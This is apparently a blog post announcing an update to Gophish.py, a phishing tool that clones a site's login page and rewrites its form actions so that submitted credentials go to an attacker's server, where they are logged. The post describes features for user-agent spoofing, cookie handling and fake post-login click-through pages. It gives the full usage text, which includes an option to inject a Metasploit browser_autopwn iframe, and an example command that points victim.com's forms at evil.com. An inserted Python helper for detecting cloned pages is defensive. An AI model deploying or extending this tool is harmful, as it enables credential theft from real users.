I’ve released a new version of Gophish.py. The update includes:
- Fixed a bug in rewriting the method attribute in phished forms
- Fixed a bug with GET based forms
- Fixed a bug in the autofill option, fixed the demo/sample file accordingly
- Fixed some bugs regarding correctly closing files
- Added functionality to reverse BeautifulSoup rewriting & to '&amp;'
- Added functionality to rewrite 'url(www.example.com)' in CSS
- Added functionality to handle onsubmit/onkeypress/onclick attributes in FORM/INPUT tags
- Added a feature to pass a user agent header when connecting to the target
- Added a feature to send cookies
- Added a feature to serve a click through page post form submission
- Added the clickable feature to provide additional click through pages after form submission and the initial click through
Quite a few bugs were fixed, one of which has been around from the beginning. In some cases, the METHOD attribute of FORM tags wasn’t correctly rewritten, breaking form submission functionality.
I updated the code to use 'soup.prettify(formatter="html")' in order to fix some issues with bad characters and HTML. This broke the autofill functionality. I have now updated that functionality as well as the sample file.
In some cases, files opened by gophish weren’t correctly closed, which broke the script after the first initial connection. This is now fixed.
The first "feature" I added is more of a fix. BeautifulSoup, when using 'formatter="html"', tries to fix bad HTML by closing out some tags and escaping &'s to '&amp;', < to '&lt;', and > to '&gt;'. The last two are fine, but the & fix more often than not results in literal '&nbsp;' strings being printed on the page, because entities that were already there are rewritten as '&amp;nbsp;'. I now reverse this after BeautifulSoup does its thing.
The next functionality enhancement involves rewriting CSS within the page that contains 'url(...)' references. A relative value such as 'url(/path/to/file)' will now be rewritten to point at the correct URL on the original site, so the stylesheet assets still load.
In addition, I added functionality to strip onsubmit/onkeypress/onclick attributes from FORM/INPUT tags, since in some cases these break form submissions. Those attributes are now rewritten to be empty.
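From the defensive side, the rewriting described above leaves recognisable traces in the served HTML. The following Python is an added example (not part of Gophish.py or this post) that triages a fetched page for three of them: FORM actions that post to a host other than the page's own, inline onsubmit/onkeypress/onclick handlers blanked to "", and double-escaped entities that surface as literal '&nbsp;' text. The sample HTML and the host names in it are constructed for the example.

```python
"""Triage helper for cloned-login-page artifacts (added example, stdlib only)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

HANDLERS = ("onsubmit", "onkeypress", "onclick")


class CloneIndicatorParser(HTMLParser):
    """Collects indicators that a page was passed through a form-rewriting proxy."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).netloc.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # Resolve relative actions against the page URL, then compare hosts.
            action = a.get("action") or ""
            host = urlparse(urljoin(self.page_url, action)).netloc.lower()
            if host and host != self.page_host:
                self.findings.append(f"form action posts off-origin to {host}")
        if tag in ("form", "input"):
            # A handler present but set to "" (or bare) is the blanking described above.
            for h in HANDLERS:
                if h in a and (a[h] or "") == "":
                    self.findings.append(f"<{tag}> has blanked {h} attribute")

    def handle_data(self, data):
        # "&amp;nbsp;" in the source is unescaped by HTMLParser to the literal text "&nbsp;".
        if "&nbsp;" in data:
            self.findings.append("literal '&nbsp;' text (double-escaped entity)")


def scan(html, page_url):
    """Return the list of indicator strings found in `html` served as `page_url`."""
    p = CloneIndicatorParser(page_url)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a cloned login form posting to an attacker host (placeholder name).
SAMPLE = """<html><body>
<form method="post" action="https://evil.example/login.php" onsubmit="">
  <input name="user" onkeypress="">
  <input type="password" name="pass">
</form>
<p>Welcome&amp;nbsp;back</p>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE, "https://www.victim.com/login.php"):
        print(finding)
```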
Now the fun stuff: features. The first feature seems like a no-brainer. You can now pass a file containing a 'User-Agent' header to gophish. The new option is '--useragent filename.txt', assuming the user agent file you are using is named 'filename.txt'. This resolves cases in which the site responds with a "Browser not supported" page instead of the real login page because of the default user agent sent by Python.
The real fun is the new click through support and its options. The first option is '--clickthrough clickpage.html', assuming the first click through page you want to use is named 'clickpage.html'. This changes gophish's behaviour: instead of logging the submitted form values and redirecting to the real page (submitting the values to the real page), it serves the 'clickpage.html' file. So you can have the initial phish page and then a secondary fake post login page, for example.
The next option, '--clickable', builds on this functionality. You can provide additional HTML files, comma delimited, that are served based on their name. So, if you passed in '--clickthrough clickpage.html --clickable page1.html,page2.html,page3.html' for example, the flow would be:
- User accesses initial phish page, fills in form data, and submits
- Submitted data is logged and then the user is served 'clickpage.html'
- If 'clickpage.html' also has a form with an action of 'page1.html' and the user submits it, they are served 'page1.html', which was provided with the '--clickable' option.
- Or, if there are other links for the user to click on with href='page2.html' and href='page3.html', then when the user clicks one of these links they are served the respective page.
These new features greatly enhance the functionality of your phishing page while remaining simple to use and implement. I hope someone out there finds them useful.
The new version of the code can be found here. The updated autofill sample file can be found here. A sample user agent file can be found here.
Updated usage information for the script:
usage: gophish.py [-h] --phish PHISH --replace REPLACE [--logfile LOGFILE]
                  [--listen LISTEN] [--port PORT] [--ssl] [--sslchain SSLCHAIN]
                  [--sslcert SSLCERT] [--sslkey SSLKEY] [--autopwn AUTOPWN]
                  [--autofill AUTOFILL] [--redirect REDIRECT]
                  [--redirectto REDIRECTTO] [--landing LANDING]
                  [--clickthrough CLICKTHROUGH] [--clickable CLICKABLE]
                  [--useragent USERAGENT] [--sendcookies]

Automatically setup a phishing site.

optional arguments:
  -h, --help            show this help message and exit
  --phish PHISH         the full URL to phish back to the victim (must include http(s)://) (default: None)
  --replace REPLACE     the IP/FQDN to replace FORM actions with (must include http(s):// and final /) (default: None)
  --logfile LOGFILE     log file to store submitted form values (default: phishlog.txt)
  --listen LISTEN       the IP to bind to (default: 0.0.0.0)
  --port PORT           the port to start the listening web server on (default: 80)
  --ssl                 enable SSL on the running port (default: 0)
  --sslchain SSLCHAIN   certificate chain file to use when ssl option is enabled (default: chain.crt)
  --sslcert SSLCERT     certificate file to use to use when ssl option is enabled (default: ssl.crt)
  --sslkey SSLKEY       private key file to use to use when ssl option is enabled (default: ssl.key)
  --autopwn AUTOPWN     Metasploit auxiliary/server/browser_autopwn URL to inject as an iFrame (default: None)
  --autofill AUTOFILL   file to use to autosubmit autocomplete fields (default: None)
  --redirect REDIRECT   redirect requests for this address somewhere else (default: None)
  --redirectto REDIRECTTO
                        redirect requests in the redirect option to this address (full link, must include http(s)://) (default: www.google.com)
  --landing LANDING     redirect to this landing page instead of original site after form is submitted (include full link) (default: None)
  --clickthrough CLICKTHROUGH
                        file to serve up after user enters form credentials on main phish page (default: None)
  --clickable CLICKABLE
                        used in combination with clickthrough, comma separated list of files to serve based on requested name (default: None)
  --useragent USERAGENT
                        file to use to pass a user agent value in the request (default: None)
  --sendcookies         initiate a connection, get the cookies, send cookies back in second connection (default: 1)

Example:
gophish.py --phish https://www.victim.com/login.php --replace https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt --sslkey ssl.key